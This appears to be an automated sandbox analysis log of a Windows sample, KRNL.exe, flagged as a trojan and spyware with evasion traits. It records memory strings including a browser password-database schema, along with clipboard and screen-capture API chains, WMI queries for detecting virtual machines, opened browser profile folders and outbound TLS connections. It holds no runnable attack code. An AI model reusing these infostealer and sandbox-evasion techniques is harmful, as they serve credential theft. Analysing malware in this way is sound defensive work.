                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptc;
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: KRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004322E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_004322E0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_058A1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_058A1000
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004322E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_004322E0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043328C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_0043328C
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006E10000_2_006E1000
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006EF5550_2_006EF555
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_007077920_2_00707792
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_00705C5E0_2_00705C5E
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006F9CC00_2_006F9CC0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006F3FB20_2_006F3FB2
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042C8D02_2_0042C8D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0040A8B02_2_0040A8B0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043F1502_2_0043F150
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004379602_2_00437960
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043B1D02_2_0043B1D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004102472_2_00410247
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0040B2622_2_0040B262
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043FB102_2_0043FB10
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00409C6F2_2_00409C6F
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00437CF02_2_00437CF0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004215702_2_00421570
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004265202_2_00426520
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004236752_2_00423675
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0040C6212_2_0040C621
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004116A02_2_004116A0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004240602_2_00424060
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043E8202_2_0043E820
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041602C2_2_0041602C
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004190D12_2_004190D1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004038F02_2_004038F0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004320B02_2_004320B0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043B9402_2_0043B940
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004141612_2_00414161
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004181702_2_00418170
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004371702_2_00437170
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041717B2_2_0041717B
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004091002_2_00409100
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041D9002_2_0041D900
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043E9202_2_0043E920
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004059302_2_00405930
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004199302_2_00419930
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043E9D02_2_0043E9D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004151A92_2_004151A9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0040E9B02_2_0040E9B0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004061B02_2_004061B0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004269B02_2_004269B0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043EA602_2_0043EA60
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00415A722_2_00415A72
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042F2112_2_0042F211
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042822F2_2_0042822F
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004082C02_2_004082C0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00425ACF2_2_00425ACF
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00425ACF2_2_00425ACF
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00425A902_2_00425A90
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004042A02_2_004042A0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041CAA02_2_0041CAA0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0040EB3B2_2_0040EB3B
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004373D02_2_004373D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00404BE02_2_00404BE0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041138A2_2_0041138A
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041E3902_2_0041E390
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00423C402_2_00423C40
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043F4502_2_0043F450
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042CC5D2_2_0042CC5D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004304702_2_00430470
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004074102_2_00407410
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00427C292_2_00427C29
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00410C832_2_00410C83
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042B48C2_2_0042B48C
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004164A32_2_004164A3
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004275512_2_00427551
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004365692_2_00436569
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004095702_2_00409570
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042BD772_2_0042BD77
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0040F5292_2_0040F529
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041DDC02_2_0041DDC0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041ADD02_2_0041ADD0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042F5D92_2_0042F5D9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004285E12_2_004285E1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004066402_2_00406640
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00438E402_2_00438E40
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043B6502_2_0043B650
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00431E502_2_00431E50
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042CE602_2_0042CE60
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043DE192_2_0043DE19
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004296302_2_00429630
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042BE3B2_2_0042BE3B
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00423EC02_2_00423EC0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004386C02_2_004386C0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00402ED02_2_00402ED0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00435ED32_2_00435ED3
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042DEF12_2_0042DEF1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042BE9D2_2_0042BE9D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0042C8D02_2_0042C8D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004167772_2_00416777
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043E7102_2_0043E710
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0041B7292_2_0041B729
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00438FD92_2_00438FD9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043F7802_2_0043F780
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004177AD2_2_004177AD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006E10002_2_006E1000
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006EF5552_2_006EF555
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_007077922_2_00707792
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00705C5E2_2_00705C5E
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006F9CC02_2_006F9CC0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006F3FB22_2_006F3FB2
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: String function: 006F80F8 appears 42 times
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: String function: 006F0730 appears 38 times
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: String function: 00413CD0 appears 75 times
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: String function: 006FCFD6 appears 40 times
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: String function: 00407FA0 appears 46 times
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: String function: 006EFA60 appears 100 times
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: String function: 006EFAE4 appears 34 times
                    Source: KRNL.exeStatic PE information: invalid certificate
                    Source: KRNL.exe, 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exe, 00000002.00000000.1675548186.000000000076D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exe, 00000002.00000003.1675825839.0000000004DBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs KRNL.exe
                    Source: KRNL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: KRNL.exeStatic PE information: Section: .bss ZLIB complexity 1.0003298756270902
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@12/2
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00437CF0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00437CF0
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
                    Source: KRNL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\KRNL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: KRNL.exe, 00000002.00000003.1712400298.0000000005A45000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711739923.0000000005A77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: KRNL.exeVirustotal: Detection: 40%
                    Source: KRNL.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\Desktop\KRNL.exeFile read: C:\Users\user\Desktop\KRNL.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\KRNL.exe "C:\Users\user\Desktop\KRNL.exe"
                    Source: C:\Users\user\Desktop\KRNL.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\KRNL.exeProcess created: C:\Users\user\Desktop\KRNL.exe "C:\Users\user\Desktop\KRNL.exe"
                    Source: C:\Users\user\Desktop\KRNL.exeProcess created: C:\Users\user\Desktop\KRNL.exe "C:\Users\user\Desktop\KRNL.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: KRNL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: KRNL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: KRNL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: KRNL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: KRNL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: KRNL.exeStatic PE information: real checksum: 0x8e247 should be: 0x97536
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006EFB83 push ecx; ret 0_2_006EFB96
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_004479FC push edi; retf 2_2_004479FD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00447371 push 084300B2h; ret 2_2_0044739E
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00444D1C push eax; retf 2_2_00444D1E
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00447D95 pushad ; iretd 2_2_00447FDD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043B5B0 push eax; mov dword ptr [esp], 31A531AAh2_2_0043B5BE
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043E6B0 push eax; mov dword ptr [esp], 352E36E1h2_2_0043E6B3
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00446F14 push ebp; ret 2_2_00446F15
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006EFB83 push ecx; ret 2_2_006EFB96
                    Source: C:\Users\user\Desktop\KRNL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\KRNL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\Desktop\KRNL.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeWindow / User API: threadDelayed 6702Jump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21459
                    Source: C:\Users\user\Desktop\KRNL.exeAPI coverage: 9.4 %
                    Source: C:\Users\user\Desktop\KRNL.exe TID: 2492Thread sleep time: -210000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exe TID: 4944Thread sleep count: 6702 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\KRNL.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\KRNL.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_00701FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00701FE9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00701F38 FindFirstFileExW,2_2_00701F38
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00701FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00701FE9
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\.ms-adJump to behavior
                    Source: KRNL.exe, 00000002.00000003.1976890658.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1765441778.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976367913.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915821353.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821869308.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915718328.000000000332C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
